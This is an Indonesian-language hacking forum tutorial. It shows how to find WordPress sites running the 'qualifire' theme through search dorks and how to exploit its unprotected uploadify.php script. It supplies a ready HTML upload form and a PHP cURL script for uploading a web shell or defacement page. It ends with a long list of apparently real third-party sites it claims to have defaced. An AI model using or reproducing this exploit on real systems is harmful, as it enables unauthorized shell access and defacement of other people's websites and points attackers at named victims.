xixihi, Nuenomaru disini .-.sesuai judul thread nue akan share sekarang :vBug 11/12 sama uploadify ,siapa tau ada yang belum tau
Dork : - inurl:"/wp-content/themes/qualifire"- inurl:"/wp-content/themes/qualifire" site:.fr(sisanya kembangin lagi, biar dapet web2 yang vuln and verawaan :v )
Pengendali Pinguin bisa baca ini dulu ;)Dorking pada BinGoo di Linux
Exploit : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
Vuln? biasanya Blank putih atau muncul angka/huruf gak jelas , tapi kalo 404 not found berarti ikhlasin aja hehehe
Copy Script Upload CSRF:<form
action="http://target.co.li/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>
* Save As: .html (contoh.html)* edit/ganti target.co.li ~> menjadi link target yang sobat temukan
- Lalu buka .html yang sudah kalian save- klik browse (pilih shell , pilih script deface , pilih gambar , atau file txt)*seterah kalian mau upload apa, tapi disini saya akan upload file gambar (png, jpg, gift, dll)
Jika upload file anda berhasil kalo gak salah akan nampak seperti gambar dibawah:
Done :p
Shell Akses:
http;//site.com/namashell.php
karna saya upload gambar jadinya kek gitu:
http://site.com/tkjcyberarttimeline.png
Remote file :
<?php
$uploadfile="shell.php";
$ch = curl_init("target.coli/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/themes/qualifire/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Akses: /wp-content/themes/qualifire/scripts/admin/uploadify/namashell.phpSekian tutorial cupuu dari saya :'(*jangan bully plis
Demo Tested By Nuenomaru | TKJ CYBER ART:
http://www.floridahurricaneclaim.org/tkjcyberart.htmhttp://www.depal.it/tkjcyberart.htmhttp://www.vitalisspor.com.tr/tkjcyberart.htmhttp://cazatalentos.gsconsultores.cl/tkjcyberart.htmhttp://www.tecnigrafformosa.com.ar/tkjcyberart.htmhttp://www.altusdisain.ee/tkjcyberart.htmhttp://www.tablawfirm.net/tkjcyberart.htmhttp://theyuppypuppy.net/tkjcyberart.htmhttp://pointscape.net/tkjcyberart.htmhttp://www.tropicanaplants.net/tkjcyberart.htmhttp://www.frontierlighting.net/nuenomaru.htmlhttp://www.marefrigeracao.net/nuenomaru.htmlhttp://www.tecnigrafformosa.com.ar/nuenomaru.htmlhttp://cazatalentos.gsconsultores.cl/nuenomaru.htmlhttp://www.altusdisain.ee/nuenomaru.htmlhttp://www.depal.it/nuenomaru.htmlhttp://pedetcell.esy.es/nuenomaru.htmlhttp://www.vitalisspor.com.tr/nuenomaru.htmlhttp://www.foto3.kuckovsky.sk/nuenomaru.htmlhttp://www.archermedia.ro/nuenomaru.htmlhttp://www.proconfortgrup.ro/tkjcyberart.htmhttp://www.clararededeprotecao.com.br/tkjcyberart.htmhttp://www.institutobelezaeestetica.com.br/tkjcyberart.htmhttp://www.casaprojetada.com.br/nuenomaru.htmlhttp://agssi.com.br/nuenomaru.htmlhttp://www.lhpyacht.cz/tkjcyberart.htmhttp://domfunkcjonalny.pl/tkjcyberart.htmhttp://auroraaudio.net/tkjcyberart.htmhttp://visionsandiego.com/tkjcyberart.htmhttp://videosurveillanceforce.com/tkjcyberart.htmhttp://schaumbergbuilders.com/tkjcyberart.htmhttp://seattleu-esw.org/tkjcyberart.htmhttp://www.daewoomaquinarias.com.pe/nuenomaru.htmlhttp://www.vitalisspor.com.tr/nuenomaru.htmlhttp://ulusalyangin.com.tr/nuenomaru.htmlhttp://nationalnanomaterials.com/nuenomaru.htmlhttp://www.afreestylecamp.com/tkjcyberart.htmhttp://orlandoconsolerepair.com/tkjcyberart.htmhttp://www.countrywdc.co.uk/tkjcyberarttimeline.pnghttp://nuovaclean.it/tkjcyberarttimeline.pnghttp://www.nuovaclean.it/tkjcyberart.pnghttp://paccdc.org/tkjcyber2.jpghttp://www.blackpants.net/tkjciber4.jpghttp://www.maxiwall.co.za/tkjciber3.jpghttp://www.grill-n-chill.co.uk/tkjciber.jpghttp://www.oni2015.isj-db.ro/tkjcyberarttimeline.pnghttp://www.qualitechservice.com.br/tkjciber4.jpghttp://www.tecrocompany.ro/tkjcyber.pnghttp://www.equipmentdoctor.ca/tkj%20cyber%20art3.jpghttp://www.dev.constr18.whc.ca/tkj%20cyber%20art.jpghttp://kait.mx/tkjcyber.jpghttp://stavrostonerestoration.com.au/tkjcyber.jpghttp://jpc.com.my/tkjcyber2.jpghttp://the-paint-pub.com/tkj%20cyber%20art.jpghttp://bedcraftersbymichelle.com/tkjcyberarttimeline.pnghttp://annsimas.com/tkjcyberarttimeline.pnghttp://www.frontierlighting.net/tkjcyberarttimeline.pnghttp://www.blackpants.net/tkjcyberarttimeline.pnghttp://www.reklame-forum.no/tkjcyberart.pnghttp://www.roodfotografie.nl/tkjcyber2.jpg
Semoga bermanfaat , dan maaf bila ada kesalahanHappy Wordpress Deface ya Om
Source and thanks to: Forum INCEF
Nuenomaru
Nuenomaru just an illusion in Cyber World
Visit and follow :
BBM : C0018D1A2